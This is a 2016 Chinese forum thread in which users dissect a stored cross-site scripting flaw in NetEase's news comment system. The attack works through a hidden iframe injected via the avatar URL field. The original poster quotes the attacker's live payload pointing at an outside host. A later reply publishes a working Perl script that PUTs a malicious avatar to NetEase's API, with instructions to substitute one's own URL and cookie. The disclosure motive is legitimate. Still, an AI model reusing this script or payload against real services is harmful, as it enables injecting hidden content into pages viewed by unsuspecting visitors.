V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
alexecn
V2EX  ›  分享发现

网易的评论系统有漏洞了吧!

  •  
  •   alexecn · 2016-06-18 19:39:30 +08:00 · 5741 次点击
    这是一个创建于 3071 天前的主题,其中的信息可能已经有所发展或是发生改变。

    刚才访问: http://sports.163.com/16/0618/11/BPRCO3DM00051CA1.html#p=BMVOG5U20AI90005

    会自动跳转到: http://52track.com:94/ (美国地址)

    现在不跳转了,但还是会调入: http://chatp.jordan2u.com/23/test.php 这个 url 。(美国地址)

    开始有些奇怪,后来查了一下代码,发现问题在这个 url : http://sdk.comment.163.com/api/v1/products/a2869674571f77b5a0867c3d71db5856/threads/BPRCO3DM00051CA1/comments/hotList?offset=0&limit=3&showLevelThreshold=70&headLimit=1&tailLimit=2&ibc=jssdk&callback=tool1009691620930263987_1466248158686&_=1466248158687

    该 url 的内容:

    tool1009691620930263987_1466248158686( {"commentIds":["2418735840","2418735840,2418825858","2418910814"],"comments":{"2418735840":{"against":11,"anonymous":false,"buildLevel":1,"commentId":2418735840,"content":"葛格利亚才是贤母的典范!","createTime":"2016-06-18 11:59:06","favCount":0,"ip":"115.193..","isDel":false,"postId":"BPRCO3DM00051CA1_2418735840","productKey":"a2869674571f77b5a0867c3d71db5856","shareCount":0,"siteName":"网易","source":"ph","unionState":false,"user":{"avatar":"http://imgm.ph.126.net/_sStRF4UCYz2gI5hzRrXpg==/6630565288886574327.jpg","id":"NTU5ZjYwMGVjMmQxYjQyNDY1MjhiZGU5OTBlYWQwYjdAdGVuY2VudC4xNjMuY29t","label":"[{"endTime":"1447629212974","startTime":"1447542812973","tagKey":"100"},{"endTime":"1441987817968","startTime":"1441901417967","tagKey":"101"},{"endTime":"1446868704041","startTime":"1446782304040","tagKey":"102"},{"endTime":"1442202823801","startTime":"1442116423800","tagKey":"103"},{"endTime":"1442095939822","startTime":"1442009539822","tagKey":"104"},{"endTime":"1447616152210","startTime":"1447529752210","tagKey":"105"}]","location":"浙江省杭州市","nickname":"詹跑跑","userId":63025043,"vipInfo":"vipt"},"vote":1050},"2418825858":{"against":15,"anonymous":false,"buildLevel":2,"commentId":2418825858,"content":"看到满屏黑狗真来火了,来做个统计詹姆斯爷们篮球,库里娘炮篮球!本人 02 詹迷 168 身高 88kg 吹牛被雷劈!","createTime":"2016-06-18 12:04:28","favCount":0,"ip":"120.42..","isDel":false,"postId":"BPRCO3DM00051CA1_2418825858","productKey":"a2869674571f77b5a0867c3d71db5856","shareCount":0,"siteName":"网易","source":"ph","unionState":false,"user":{"avatar":"http://img5.cache.netease.com/tie/images/noface80_80.png""><iframe src="&lt;a href=" http:="" <a="" href="http://chatp.jordan2u.com" rel="nofollow">chatp.jordan2u.com="" 23="" test.php"="" rel="nofollow">http://chatp.jordan2u.com/23/test.php" style="display:none"></iframe>.","isDel":false,"postId":"BPRCO3DM00051CA1_2418910814","productKey":"a2869674571f77b5a0867c3d71db5856","shareCount":0,"siteName":"网易","source":"ph","unionState":false,"user":{"avatar":"http://mimg.126.net/p/butter/1008031648/img/face_big.gif","id":"Y2NibG5sd0AxNjMuY29t","location":"辽宁省沈阳市","nickname":"红黑色的梦想","userId":543741},"vote":739}}});

    看 url 应该是评论系统,被插入了一条恶意评论,导致 json 解析错误。然后插入了一个 iframe 。

    网易抓紧自查一下吧,现在 人家还在继续实验呢!

    20 条回复    2017-01-03 12:39:12 +08:00
    alexecn
        1
    alexecn  
    OP
       2016-06-18 19:54:07 +08:00
    貌似这一会更坏了, 正在随意的添加 url , 刷流量呢。

    主要添加了: https://www.chiphell.com/ 下面大量的 url 地址。

    先大量的添加 url ,让客户访问。然后再一一删除,掩盖痕迹。
    alexecn
        2
    alexecn  
    OP
       2016-06-18 20:15:25 +08:00
    继续的分析了一下。看上面的 json 代码,应该是 avatar 字段的问题,也就是上传用户头像的部分,用户指定上传的 url 地址没有做检查,所以恶意用户上传了一段: http://img5.cache.netease.com/tie/images/noface80_80.png""><iframe src="&lt;a href=" http:="" <a="" href="http://chatp.jordan2u.com" rel="nofollow noopener">chatp.jordan2u.com="" 23="" test.php"="" rel="nofollow noopener">http://chatp.jordan2u.com/23/test.php" style="display:none"></iframe>.
    作为他的头像地址。

    而网易这个评论系统在显示的时候,对这段从数据库里提取的代码也没有做检查,导致了这个漏洞的生效。
    7654
        3
    7654  
       2016-06-18 20:22:56 +08:00
    chiphell 已挂
    hcwhan
        4
    hcwhan  
       2016-06-18 20:24:45 +08:00 via Android
    确实
    indust
        5
    indust  
       2016-06-18 20:31:16 +08:00
    好简单的一个 XSS..
    alexecn
        6
    alexecn  
    OP
       2016-06-18 20:31:48 +08:00
    继续挖一下,
    这个评论是一个叫小红军的人发的
    http://tie.163.com/reply/myaction.jsp?action=reply&username=a2ptc25rQDE2My5jb20=

    注册时间在 2016.02.13 看来可能利用这个漏洞已经非常长的时间了。但手法并不太高明。
    没有实验好的东西不要放,特别是导致整个页面的跳转,这样非常容易被人发觉。
    如果没有整个页面跳转,我是不会去观察这个问题的。

    这里没有网易的人吗? 有的话,抓紧补了吧! 否则这个漏洞很好用哦
    leega0
        7
    leega0  
       2016-06-18 20:37:59 +08:00 via iPhone
    直接点,去乌云,那里应该有网易的安全负责人
    alexecn
        8
    alexecn  
    OP
       2016-06-18 21:26:34 +08:00
    不去那里报告了,没有注册过。

    只是看网易的 nba 新闻比较烦,网页刷的有点慢,才在这里吐吐槽而已。

    看来不是一个账户用这个漏洞,还有这个: http://tie.163.com/reply/myaction.jsp?action=reply&username=a2ptc25rQDE2My5jb20=&f=gentienickname

    他们自己顶评论,从而让这个代码可以升到新闻专题页上,现在专门发 James 的新闻评论,讨厌啊!
    NBA 好不容易看的心潮澎湃,还得帮网易抓 BUG......
    jookr
        9
    jookr  
       2016-06-18 21:42:17 +08:00
    去乌云发漏洞得邀请码能卖几百块呢 可惜啊
    alexecn
        10
    alexecn  
    OP
       2016-06-18 21:53:20 +08:00
    懒得做了,有看到这个的去那里发了吧。
    我没意见。:0-)

    我过一会把漏洞入口也发上来。
    wico77
        11
    wico77  
       2016-06-18 21:56:02 +08:00
    用户图片怎么能上传带 iframe 的 url 呀。我测试上传不了呀
    maxsec
        12
    maxsec  
       2016-06-18 23:35:27 +08:00
    XSS 漏洞
    alexecn
        13
    alexecn  
    OP
       2016-06-19 00:10:20 +08:00
    还有人等着看吗??刚才出去吃了个肉串喝了点酒。看来网易反应比较慢,都放出来,让他们好好自查吧!

    漏洞入口,就在上传头像的地方。: http://tie.163.com/setting/avatar/

    原理:搞球啊!上传了头像文件之后,服务器返回了一个头像文件的地址,然后这个地址竟然要客户的浏览器再去提交到内部的 API 。 要我是你们项目经理,就骂死你们!内部的 Http API 不是这么用的!


    代码:
    use strict;
    our $VERSION=0.1;

    use Data::Dumper;
    use AnyEvent;

    use JSON::XS;

    use AnyEvent::HTTP;


    my $cvar = AnyEvent->condvar;
    my $url='http://comment.api.163.com/api/v1/products/a2869674571f77b5a0867c3d71db5856/users?&ibc=newspc';

    my $ss=qq|http://img5.cache.netease.com/tie/images/noface80_80.png "><iframe src="http://xx.xxxx.com/xxx.php" style="display:none"></iframe>.|;
    warn encode_json({avatar=>$ss});

    http_request
    PUT => $url,
    headers => { "user-agent" => "OPener 1.0",'Content-Type'=>'application/json', "Cookie"=>''},
    body=> encode_json({avatar=>$ss}),
    timeout => 30,
    sub {
    my ($body, $hdr) = @_;
    warn $body;
    return 1;
    };

    $cvar->recv;

    $url 自己修改一下,还有 Cookie 自己改一下,就可以上传了。

    网易抓紧吧!
    LancerComet
        14
    LancerComet  
       2016-06-19 01:25:00 +08:00
    确实存在,已经传一个酷炫标题上去了
    kn007
        15
    kn007  
       2016-06-19 07:21:53 +08:00
    忘记哪个是猪场的,要不就能 at 了。。。
    alexecn
        16
    alexecn  
    OP
       2016-06-19 12:36:31 +08:00
    请不要再发邮件询问这个漏洞的具体使用!
    我一概不会回答。

    还有告诫那些破坏者,不要太过肆无忌惮的使用这些东西。一个好好的页面你插入上百条地址让人去访问,太过分些了。

    特别还是 NBA 的新闻,别坏了中子这两天看 NBA 的兴致~!
    maxsec
        17
    maxsec  
       2016-06-19 14:14:40 +08:00
    楼主,给你个思路,既然你发现这个漏洞了,何为直接以毒攻毒,让攻击者的代码失效呢?
    比如:
    {
    list: [
    lz: {
    message: "<noscript><textarea>"
    },
    attacker: {
    message: "<img onload='alert(/fuck_ding3shi/)'>"
    }
    ]
    }
    alexecn
        18
    alexecn  
    OP
       2016-06-19 16:43:11 +08:00
    @maxsec 这个似乎做不到吧! 没法把代码插入到他已经发表的评论里啊。
    ladyv2
        19
    ladyv2  
       2016-06-20 13:54:43 +08:00
    目测 http://chatp.jordan2u.com/23/test.php 已经删掉了
    昨天看了下,这个玩意叫什么网易发帖器,还留了个 qq 号码。
    tianchaodiaoming
        20
    tianchaodiaoming  
       2017-01-03 12:39:12 +08:00
    大神,能留给联系方式交流下不?
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   2527 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 25ms · UTC 16:05 · PVG 00:05 · LAX 08:05 · JFK 11:05
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.